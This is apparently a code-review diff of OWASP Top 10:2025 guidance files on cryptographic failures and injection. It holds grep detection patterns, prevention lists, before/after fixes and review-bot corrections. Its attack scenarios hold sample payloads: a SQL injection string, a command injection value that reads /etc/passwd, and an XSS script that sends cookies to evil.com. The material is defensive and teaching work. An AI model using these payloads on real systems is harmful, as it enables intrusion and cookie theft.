Buffer\.from.*base64|btoa\(|atob\(
|
|
54
|
+
base64\.encode|base64\.decode
|
|
55
|
+
|
|
56
|
+
# Cookie security flags
|
|
57
|
+
httpOnly\s*:\s*false|secure\s*:\s*false|sameSite.*none
|
|
58
|
+
Set-Cookie(?!.*Secure)(?!.*HttpOnly)
|
|
59
|
+
|
|
60
|
+
# Cleartext protocols
|
|
61
|
+
http:\/\/(?!localhost)|ftp:\/\/|smtp:\/\/
|
|
62
|
+
```
|
|
63
|
+
|
|
64
|
+
### JavaScript / TypeScript / Node.js
|
|
65
|
+
- `crypto.createHash('md5')` or `crypto.createHash('sha1')` for password hashing
|
|
66
|
+
- `Math.random()` used for tokens, session IDs, or reset codes
|
|
67
|
+
- `Buffer.from(data).toString('base64')` used as a "token" (trivially decodable)
|
|
68
|
+
- Session cookies set without `httpOnly: true`, `secure: true`, `sameSite: 'strict'`
|
|
69
|
+
- JWT secrets hardcoded in source files
|
|
70
|
+
- Missing `bcrypt`, `argon2`, or `scrypt` for password hashing
|
|
71
|
+
|
|
72
|
+
### Python
|
|
73
|
+
- `hashlib.md5()` or `hashlib.sha1()` for passwords
|
|
74
|
+
- `random.random()` or `random.randint()` for security tokens (should use `secrets` module)
|
|
75
|
+
- `base64.b64encode()` used as encryption
|
|
76
|
+
|
|
77
|
+
### Java
|
|
78
|
+
- `MessageDigest.getInstance("MD5")` or `MessageDigest.getInstance("SHA-1")`
|
|
79
|
+
- `java.util.Random` instead of `java.security.SecureRandom`
|
|
80
|
+
- Hardcoded keys in `KeySpec` constructors
|
|
81
|
+
|
|
82
|
+
## Prevention Measures
|
|
83
|
+
|
|
84
|
+
1. Classify data and identify what needs encryption per privacy laws and regulations
|
|
85
|
+
2. Don't store sensitive data unnecessarily — data not retained cannot be stolen
|
|
86
|
+
3. Encrypt all sensitive data at rest using strong algorithms (AES-256)
|
|
87
|
+
4. Use TLS 1.2+ for all data in transit; enforce with HSTS
|
|
88
|
+
5. Store passwords with strong adaptive hashing: Argon2, scrypt, bcrypt, or PBKDF2
|
|
89
|
+
6. Always use salts and appropriate work factors
|
|
90
|
+
7. Use CSPRNG for all security-sensitive random values
|
|
91
|
+
8. Never reuse IVs/nonces with the same key
|
|
92
|
+
9. Use authenticated encryption (GCM mode, not ECB/CBC)
|
|
93
|
+
10. Rotate cryptographic keys regularly
|
|
94
|
+
11. Disable caching for responses containing sensitive data
|
|
95
|
+
|
|
96
|
+
## Example Attack Scenarios
|
|
97
|
+
|
|
98
|
+
**Scenario 1 — Weak Password Hashing:**
|
|
99
|
+
Password database uses unsalted MD5. Attacker retrieves database via another vulnerability, cracks all passwords via rainbow tables in minutes.
|
|
100
|
+
|
|
101
|
+
**Scenario 2 — Predictable Tokens:**
|
|
102
|
+
Password reset tokens generated with `Math.random()`. Attacker predicts tokens and resets other users' passwords.
|
|
103
|
+
|
|
104
|
+
## Fix Examples
|
|
105
|
+
|
|
106
|
+
**Before (MD5 password hashing):**
|
|
107
|
+
```typescript
|
|
108
|
+
import crypto from 'crypto';
|
|
109
|
+
function hashPassword(password: string) {
|
|
110
|
+
return crypto.createHash('md5').update(password).digest('hex');
|
|
111
|
+
}
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**After (bcrypt with salt):**
|
|
115
|
+
```typescript
|
|
116
|
+
import bcrypt from 'bcrypt';
|
|
117
|
+
async function hashPassword(password: string) {
|
|
118
|
+
return bcrypt.hash(password, 12);
|
|
119
|
+
}
|
|
120
|
+
async function verifyPassword(password: string, hash: string) {
|
|
121
|
+
return bcrypt.compare(password, hash);
|
|
122
|
+
}
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
**Before (predictable token):**
|
|
126
|
+
```typescript
|
|
127
|
+
const resetToken = Math.random().toString(36).substring(2);
|
|
128
|
+
```
|
|
129
|
+
|
|
130
|
+
**After (cryptographically secure token):**
|
|
131
|
+
```typescript
|
|
132
|
+
import crypto from 'crypto';
|
|
133
|
+
const resetToken = crypto.randomBytes(32).toString('hex');
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
## References
|
|
137
|
+
|
|
138
|
+
- [OWASP A04:2025](https://owasp.org/Top10/2025/A04_2025-Cryptographic_Failures/)
|
|
139
|
+
- OWASP Cheat Sheet: Password Storage
|
|
140
|
+
- OWASP Cheat Sheet: Cryptographic Storage
|
|
141
|
+
- OWASP Cheat Sheet: Transport Layer Protection
|
|
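Review bot: The `Set-Cookie(?!.*Secure)(?!.*HttpOnly)` pattern under "Cookie security flags" only matches a header that lacks both flags, because the two negative lookaheads apply at the same position and must both succeed. A cookie missing just one flag is therefore never reported; splitting it into alternatives, `Set-Cookie(?!.*Secure)|Set-Cookie(?!.*HttpOnly)`, flags either omission. This pattern and `http:\/\/(?!localhost)` rely on lookaheads, which plain `grep -E` does not support, so the block should state that a PCRE-capable engine is required (for example `grep -P`). In the "After (bcrypt with salt)" example it would also help to note that bcrypt only uses the first 72 bytes of the password, so longer passphrases are silently truncated.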
@@ -0,0 +1,155 @@
|
|
|
1
|
+
# A05:2025 — Injection
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Injection is #5 in OWASP Top 10:2025 (down from #3). 100% of applications were tested for injection, and the category holds the highest CVE count at 62,445 across 37 CWEs. Injection occurs when untrusted user input is sent to an interpreter and executed as commands — including SQL, NoSQL, OS command, ORM, LDAP, and Expression Language injection. Cross-Site Scripting (XSS) is included in this category.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-79**: Cross-site Scripting (XSS) — 30,000+ CVEs
|
|
10
|
+
- **CWE-89**: SQL Injection — 14,000+ CVEs
|
|
11
|
+
- **CWE-78**: OS Command Injection
|
|
12
|
+
- **CWE-20**: Improper Input Validation
|
|
13
|
+
- **CWE-94**: Improper Control of Generation of Code (Code Injection)
|
|
14
|
+
- **CWE-77**: Command Injection
|
|
15
|
+
- **CWE-74**: Injection (general)
|
|
16
|
+
- **CWE-917**: Expression Language Injection
|
|
17
|
+
- **CWE-1336**: Template Injection
|
|
18
|
+
|
|
19
|
+
## What to Look For
|
|
20
|
+
|
|
21
|
+
### SQL Injection
|
|
22
|
+
- String concatenation in SQL queries (instead of parameterized queries)
|
|
23
|
+
- Template literals embedding user input directly into SQL
|
|
24
|
+
- ORM methods with raw query options using unsanitized input
|
|
25
|
+
- Dynamic table/column names from user input
|
|
26
|
+
|
|
27
|
+
### Command Injection
|
|
28
|
+
- `exec()`, `spawn()`, `system()`, `popen()` with user-controlled arguments
|
|
29
|
+
- Shell command strings built with user input concatenation
|
|
30
|
+
- `child_process` usage with unsanitized input
|
|
31
|
+
|
|
32
|
+
### Cross-Site Scripting (XSS)
|
|
33
|
+
- `dangerouslySetInnerHTML` in React without sanitization
|
|
34
|
+
- `innerHTML`, `outerHTML`, `document.write()` with user data
|
|
35
|
+
- Template rendering of unsanitized user input
|
|
36
|
+
- URL parameters reflected into HTML without encoding
|
|
37
|
+
|
|
38
|
+
### Code Injection
|
|
39
|
+
- `eval()` with user-controlled input
|
|
40
|
+
- `Function()` constructor with user input
|
|
41
|
+
- `setTimeout`/`setInterval` with string arguments from user input
|
|
42
|
+
- Dynamic `import()` with user-controlled paths
|
|
43
|
+
|
|
44
|
+
### Server-Side Request Forgery (SSRF)
|
|
45
|
+
- HTTP requests where the URL is user-controlled
|
|
46
|
+
- URL parsing/fetching endpoints without allowlist validation
|
|
47
|
+
- Image/preview/proxy endpoints fetching arbitrary URLs
|
|
48
|
+
|
|
49
|
+
### Grep Patterns
|
|
50
|
+
|
|
51
|
+
```
|
|
52
|
+
# SQL injection
|
|
53
|
+
\+.*['"].*SELECT|SELECT.*\+.*req\.|SELECT.*\$\{|SELECT.*%s
|
|
54
|
+
\.query\(.*\+|\.execute\(.*\+|\.raw\(.*\+
|
|
55
|
+
f"SELECT|f"INSERT|f"UPDATE|f"DELETE
|
|
56
|
+
|
|
57
|
+
# Command injection
|
|
58
|
+
exec\(|execSync\(|spawn\(|spawnSync\(
|
|
59
|
+
child_process|subprocess|os\.system|os\.popen
|
|
60
|
+
Runtime\.getRuntime\(\)\.exec
|
|
61
|
+
|
|
62
|
+
# XSS
|
|
63
|
+
dangerouslySetInnerHTML|innerHTML|outerHTML|document\.write
|
|
64
|
+
v-html|ng-bind-html|\{\{\{.*\}\}\}
|
|
65
|
+
|
|
66
|
+
# Code injection
|
|
67
|
+
eval\(|Function\(|new Function|setTimeout\(.*req|setInterval\(.*req
|
|
68
|
+
|
|
69
|
+
# SSRF
|
|
70
|
+
fetch\(.*req\.|axios\(.*req\.|http\.get\(.*req\.|urllib.*req\.
|
|
71
|
+
request\.get\(.*user|requests\.get\(.*param
|
|
72
|
+
```
|
|
73
|
+
|
|
74
|
+
### JavaScript / TypeScript / Node.js
|
|
75
|
+
- Template literals in SQL: `` `SELECT * FROM users WHERE id = ${req.params.id}` ``
|
|
76
|
+
- `exec(command)` where command includes user input
|
|
77
|
+
- `dangerouslySetInnerHTML={{ __html: userContent }}`
|
|
78
|
+
- `eval(req.body.code)` or similar
|
|
79
|
+
- `fetch(req.query.url)` in preview/proxy endpoints
|
|
80
|
+
|
|
81
|
+
### Python (Django/Flask)
|
|
82
|
+
- `cursor.execute(f"SELECT ... {user_input}")` — use parameterized queries
|
|
83
|
+
- `os.system(f"command {user_input}")` — use subprocess with shell=False
|
|
84
|
+
- `eval(request.data)` or `exec(request.data)`
|
|
85
|
+
- Jinja2 `|safe` filter on user input
|
|
86
|
+
|
|
87
|
+
### Java (Spring)
|
|
88
|
+
- `Statement.executeQuery()` with concatenated SQL (use `PreparedStatement`)
|
|
89
|
+
- `Runtime.getRuntime().exec()` with user input
|
|
90
|
+
- JSP `<%= request.getParameter() %>` without encoding
|
|
91
|
+
|
|
92
|
+
## Prevention Measures
|
|
93
|
+
|
|
94
|
+
1. Use parameterized queries / prepared statements for ALL database access
|
|
95
|
+
2. Use safe APIs that avoid the interpreter entirely
|
|
96
|
+
3. Implement positive server-side input validation (allowlists)
|
|
97
|
+
4. Escape special characters using interpreter-specific syntax
|
|
98
|
+
5. Use LIMIT and other SQL controls to prevent mass disclosure
|
|
99
|
+
6. For XSS: use framework auto-escaping, CSP headers, sanitize HTML (DOMPurify)
|
|
100
|
+
7. For command injection: avoid shell execution entirely; use library functions
|
|
101
|
+
8. For SSRF: validate and allowlist URLs; block internal network ranges
|
|
102
|
+
|
|
103
|
+
## Example Attack Scenarios
|
|
104
|
+
|
|
105
|
+
**Scenario 1 — SQL Injection:**
|
|
106
|
+
```
|
|
107
|
+
https://example.com/search?q=' OR '1'='1
|
|
108
|
+
```
|
|
109
|
+
Query becomes: `SELECT * FROM items WHERE name = '' OR '1'='1'` — returns all records.
|
|
110
|
+
|
|
111
|
+
**Scenario 2 — Command Injection:**
|
|
112
|
+
```
|
|
113
|
+
https://example.com/export?file=report;cat /etc/passwd
|
|
114
|
+
```
|
|
115
|
+
Server executes: `convert report;cat /etc/passwd` — leaks system files.
|
|
116
|
+
|
|
117
|
+
**Scenario 3 — XSS:**
|
|
118
|
+
User stores `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` as content, which executes in other users' browsers.
|
|
119
|
+
|
|
120
|
+
## Fix Examples
|
|
121
|
+
|
|
122
|
+
**Before (SQL injection):**
|
|
123
|
+
```typescript
|
|
124
|
+
const query = `SELECT * FROM notes WHERE title LIKE '%${searchTerm}%'`;
|
|
125
|
+
const results = db.all(query);
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
**After (parameterized query):**
|
|
129
|
+
```typescript
|
|
130
|
+
const results = db.all(
|
|
131
|
+
'SELECT * FROM notes WHERE title LIKE ?',
|
|
132
|
+
[`%${searchTerm}%`]
|
|
133
|
+
);
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
**Before (command injection):**
|
|
137
|
+
```typescript
|
|
138
|
+
const { exec } = require('child_process');
|
|
139
|
+
exec(`convert ${req.query.filename} output.pdf`);
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**After (safe alternative):**
|
|
143
|
+
```typescript
|
|
144
|
+
const { execFile } = require('child_process');
|
|
145
|
+
const safeName = path.basename(req.query.filename);
|
|
146
|
+
execFile('convert', [safeName, 'output.pdf']);
|
|
147
|
+
```
|
|
148
|
+
|
|
149
|
+
## References
|
|
150
|
+
|
|
151
|
+
- [OWASP A05:2025](https://owasp.org/Top10/2025/A05_2025-Injection/)
|
|
152
|
+
- OWASP Cheat Sheet: Injection Prevention
|
|
153
|
+
- OWASP Cheat Sheet: SQL Injection Prevention
|
|
154
|
+
- OWASP Cheat Sheet: Query Parameterization
|
|
155
|
+
- OWASP Cheat Sheet: XSS Prevention
|
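Review bot: The "After (safe alternative)" example for command injection still passes a user-chosen name to `convert` unchecked. `path.basename()` strips directory components, but a value beginning with `-` survives and would be parsed by the program as an option rather than a file. The snippet also uses `path` without requiring it. I would add `const path = require('path');` and reject anything outside a strict allowlist before the call, e.g. `if (!/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/.test(safeName)) throw new Error('invalid filename');`. Since readers will copy this as the template for prevention item 7, it is worth stating beside it that `execFile` removes shell parsing but not argument parsing by the target program.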